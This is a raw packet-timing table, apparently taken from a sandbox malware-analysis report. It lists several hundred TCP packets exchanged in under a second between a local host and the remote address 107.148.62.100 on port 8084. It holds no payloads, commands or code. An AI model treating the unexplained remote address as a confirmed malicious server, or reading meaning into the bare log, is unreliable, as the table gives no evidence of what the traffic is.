Dec 18, 2024 13:31:56.521009922 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.649017096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.649149895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.649266005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.649293900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.649307013 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.649368048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.650257111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.650269985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.650330067 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.650912046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.651009083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.651060104 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.651545048 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.651829004 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.651891947 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.652307987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.652514935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.652570009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.653120041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.653171062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.653222084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.653954983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.653974056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.654026031 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.654601097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.654711962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.654766083 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.655360937 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.655411959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.655462980 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.656128883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.656394958 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.656450033 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.656879902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.656949997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.657004118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.657704115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.657737970 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.657790899 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.658366919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.658477068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.658529043 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.659085035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.659193993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.659267902 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.659852982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.659996986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.660053015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.660693884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.660794973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.660847902 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.661391020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.661464930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.661516905 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.662151098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.662230968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.662286997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.662887096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.663033962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.663084984 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.663670063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.663746119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.663800001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.664400101 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.664489031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.664539099 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.665167093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.665252924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.665306091 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.665879965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.666018963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.666071892 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.666641951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.666754007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.666805983 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.667464972 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.667525053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.667581081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.668243885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.668360949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.668422937 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.668967962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.669122934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.669176102 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.669784069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.669897079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.669967890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.670460939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.670530081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.670578957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.671171904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.671286106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.671331882 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.672007084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.672210932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.672260046 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.672787905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.672858953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.672919989 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.673423052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.673659086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.673724890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.674223900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.674339056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.674397945 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.675043106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.675055981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.675112009 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.675654888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.675857067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.675910950 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.676429033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.676706076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.676759005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.677253962 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.677340984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.677393913 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.677937031 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.678158998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.678214073 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.678731918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.678905010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.678960085 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.679611921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.679740906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.679795980 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.680484056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.680608988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.680684090 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.681174040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.681375027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.681428909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.681840897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.681919098 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.681971073 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.682504892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.682591915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.682646036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.683233976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.683332920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.683382034 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.683998108 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.684257030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.684312105 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.684748888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.684874058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.684930086 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.685527086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.685579062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.685636997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.686316013 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.686413050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.686465979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.687036991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.687108994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.687160015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.687787056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.687890053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.687952042 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.688719988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.735246897 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.841476917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.841556072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.841696978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.841773033 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.841852903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.841914892 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.842432976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.842634916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.843267918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.843334913 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.843502998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.843966007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.844017029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.844024897 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.844058990 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.844887018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.844970942 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.845026016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.845630884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.845724106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.845783949 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.846580029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.846663952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.847210884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.847264051 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.847454071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.847868919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.847925901 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.847959995 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.848015070 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.848419905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.848489046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.848552942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.849159956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.849189043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.849244118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.849880934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.849894047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.849957943 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.850446939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.850497961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.851284027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.851336956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.851357937 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.852181911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.852221012 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.852264881 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.852814913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.852865934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.852893114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.853591919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.853650093 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.853668928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.853729963 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.854307890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.854320049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.854373932 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.854970932 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.855072975 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.855134010 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.855714083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.855923891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.856195927 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.856463909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.856797934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.857510090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.857562065 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.857598066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.858254910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.858304977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.858313084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.858349085 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.858870983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.858982086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.859040976 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.859574080 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.859586000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.859637976 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.860416889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.860428095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.860485077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.861136913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.861397982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.861450911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.861852884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.861922026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.862047911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.862514019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.862608910 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.862679958 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.863325119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.863528013 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.863588095 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.864185095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.864231110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.864285946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.864877939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.864986897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.865540028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.865607023 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.865741014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.866584063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.866633892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.866643906 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.866683006 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.867014885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.867216110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.867271900 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.867885113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.867995977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.868057966 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.868617058 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.868745089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.868799925 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.869679928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.869857073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.870549917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.870606899 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.870676994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.871227980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.871288061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.871429920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.871481895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.872072935 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.872231007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.872853041 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.872924089 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.872989893 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.873570919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.873584986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.873631001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.874198914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.874386072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.874444962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.874859095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.875017881 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.875920057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.875976086 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.876058102 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.876194000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.876632929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.876889944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.876944065 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.877475977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.877528906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.877587080 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.878180981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.878192902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.878236055 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.878635883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.878700018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.879245043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.879297972 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.879336119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.879539967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.880006075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.880264044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.880302906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.880347967 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:56.881150007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:56.884227991 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.033587933 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.033605099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.033706903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.033752918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.033818007 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.033896923 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.034603119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.034805059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:31:57.034856081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:31:57.035264015 CET	8084	49705	107.148.62.100	192.168.2.5
